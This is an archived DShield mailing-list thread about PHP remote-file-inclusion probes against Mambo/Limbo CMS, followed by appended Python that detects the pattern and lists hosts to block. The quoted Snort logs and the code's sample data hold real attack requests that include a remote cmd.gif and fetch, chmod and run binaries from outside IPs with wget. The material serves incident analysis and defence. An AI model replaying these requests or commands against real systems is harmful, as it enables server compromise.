[Dshield] PHP injection attacks

Joel Esler eslerj at gmail.com
Thu Dec 22 12:42:46 GMT 2005


Agreed, most likely not vulnerable; see the other post going on
currently about "Can Someone Decipher This Log Entry". First, know
that you are not alone, and second, know that there are about 20 variants
of it.

J


On Dec 22, 2005, at 4:58 AM, Meidinger Chris wrote:

> Hi,
>
> This is the same thing David just asked about.
>
> It looks like you're right, that it's not mambo but limbo CMS.
> Apparently they both use similar code or libraries.
>
> I can't imagine your VPN-Gateway being susceptible to the attacks
> with or without patches. They seem to be for limbo running on
> apache running on *nix. That is very unlikely to be a part of your
> VPN setup.
>
> What does a packet dump show you? Is your box sending out 404's ??
>
> Cheers,
>
> Chris
>
> -----Original Message-----
> From: list-bounces at lists.dshield.org on behalf of  
> tfischer at oldenburggroup.com
> Sent: Thu 22-Dec-05 04:25
> To: list at lists.dshield.org
> Subject: [Dshield] PHP injection attacks
>
>
>    I have started to see exploit attempts against my VPN. I believe
> I have identified them as:
>  FrSIRT advisory 12/15/05 - ADV-2005-2932  CVE-2005-4317 CVE-2005-4318
> CVE-2005-4319 CVE-2005-4320
>    I called my VPN vendor to see if they were susceptible to this
> type of attack. They said that as long as I had the latest patches I
> should be fine. I asked them why the device does not log the
> attempts. They said they didn't know, but there was no need to worry
> as long as the patches were in. The attacks are only being directed
> at this box. They come in sets of 5 or 6. There was one set Monday
> night, 6 yesterday and 50 so far today. Does anyone know if this
> pattern has been automated and I'm just seeing some bots out there
> searching? Anyone else seeing this?
>    Here are some of the SNORT logs:
>
> GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1
> Host: my.ip.address
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
>
> GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1
> Host: my.ip.address
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
>
> GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1
> Host: my.ip.address
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
>
> GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1
> Host: my.ip.address
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
>
> GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%2066.235.205.212/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo| HTTP/1.1
> Host: my.ip.address
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
>
> GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%2066.235.205.212/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo| HTTP/1.1
> Host: my.ip.address
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
>
> GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%2066.235.205.212/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo| HTTP/1.1
> Host: my.ip.address
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
>
> GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%2066.235.205.212/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo| HTTP/1.1
> Host: my.ip.address
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
>
>
>
> _________________________________________
> Learn about Intrusion Detection in Depth from the comfort of your  
> own couch:
> https://www.sans.org/athome/details.php?id=1341&d=1
>
> _______________________________________________
> send all posts to list at lists.dshield.org
> To change your subscription options (or unsubscribe), see: http:// 
> www.dshield.org/mailman/listinfo/list

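Every probe in the quoted Snort logs has the same shape, whichever path prefix it tries: a `GLOBALS=` parameter (to get past the CMS's register_globals check), `mosConfig_absolute_path=` pointing at a remote URL (the remote file inclusion), and a `cmd=` parameter carrying the URL-encoded shell stage that fetches and runs a second-stage binary. The following Python is an added example written for this archive page; it is not code from the thread or from any of the posters. It recognises that shape in request lines, leaves ordinary Mambo requests alone, and pulls out the indicators a defender would search logs for or block: the include host, the host the binary is fetched from, and the decoded command. The sample request lines are reconstructed from the Snort entries above with the mail wrapping removed; the benign request line is constructed, and the `curl`/`fetch` variants it also looks for are an assumption (the thread only shows `wget`).

```python
import re
from urllib.parse import unquote, urlsplit

# Query parameter the quoted probes abuse to point Mambo/Limbo's include()
# at an attacker-controlled URL (remote file inclusion).
INCLUDE_PARAM = "mosConfig_absolute_path"
# Parameter the probes set to an empty value to get past the CMS's
# register_globals protection check.
GLOBALS_PARAM = "GLOBALS"
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# Download tools to look for in the decoded cmd stage. The thread only
# shows wget; curl and fetch are assumed variants.
FETCH_RE = re.compile(r"\b(?:wget|curl|fetch)\s+(?:-\S+\s+)*([^\s;|&]+)",
                      re.IGNORECASE)

# Sample request lines: the first two are reconstructed from the Snort
# entries in the thread (mail wrapping removed); the third is a
# constructed benign Mambo request.
SAMPLE_REQUESTS = [
    "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1"
    "&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?"
    "&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;"
    "./listen;echo%20YYY;echo| HTTP/1.1",
    "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1"
    "&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?"
    "&cmd=cd%20/tmp;wget%2066.235.205.212/sexy;chmod%20744%20sexy;"
    "./sexy%20200.60.149.19%208080;00;echo%20YYY;echo| HTTP/1.1",
    "GET /index.php?option=com_content&task=view&id=12&Itemid=2 HTTP/1.1",
]


def split_query(query):
    """Split a raw query string on '&' only, leaving values encoded.
    urllib.parse.parse_qsl also splits on ';' in older Pythons, which
    would tear the shell command stage into pieces, so it is not used."""
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def analyse_request(request_line):
    """Return None for a request without a remote include, otherwise a
    dict of indicators extracted from the probe."""
    fields = request_line.split()
    if len(fields) < 2:
        return None
    url = urlsplit(fields[1])
    params = split_query(url.query)
    include_url = next((v for k, v in params
                        if k == INCLUDE_PARAM and REMOTE_URL_RE.match(v)),
                       None)
    if include_url is None:
        return None
    command = next((unquote(v) for k, v in params if k == "cmd"), None)
    fetch = FETCH_RE.search(command) if command else None
    return {
        "path": url.path,
        "globals_override": any(k == GLOBALS_PARAM for k, _ in params),
        "include_host": urlsplit(include_url).hostname,
        "command": command,
        "payload_url": fetch.group(1) if fetch else None,
    }


def scan_requests(lines):
    """Run analyse_request over many lines. Returns (hits, hosts), where
    hosts is the sorted set of include and payload hosts to block."""
    hits = [r for r in map(analyse_request, lines) if r]
    hosts = set()
    for hit in hits:
        hosts.add(hit["include_host"])
        if hit["payload_url"]:
            hosts.add(hit["payload_url"].split("/")[0])
    return hits, sorted(hosts)


if __name__ == "__main__":
    found, block_list = scan_requests(SAMPLE_REQUESTS)
    for hit in found:
        print(f"{hit['path']}: include from {hit['include_host']}, "
              f"GLOBALS override={hit['globals_override']}, "
              f"fetches {hit['payload_url']}")
    print("hosts to block:", ", ".join(block_list))
```

Feeding real access-log or Snort request lines through `scan_requests` gives the list of hosts to add to an egress block list; a device that cannot reach the include host or the payload host cannot be exploited by this stage even if the CMS is vulnerable. Matching on the parameter shape rather than on a fixed path is what lets one check cover the `/`, `/mambo/`, `/cvs/` and `/cvs/mambo/` variants in the logs.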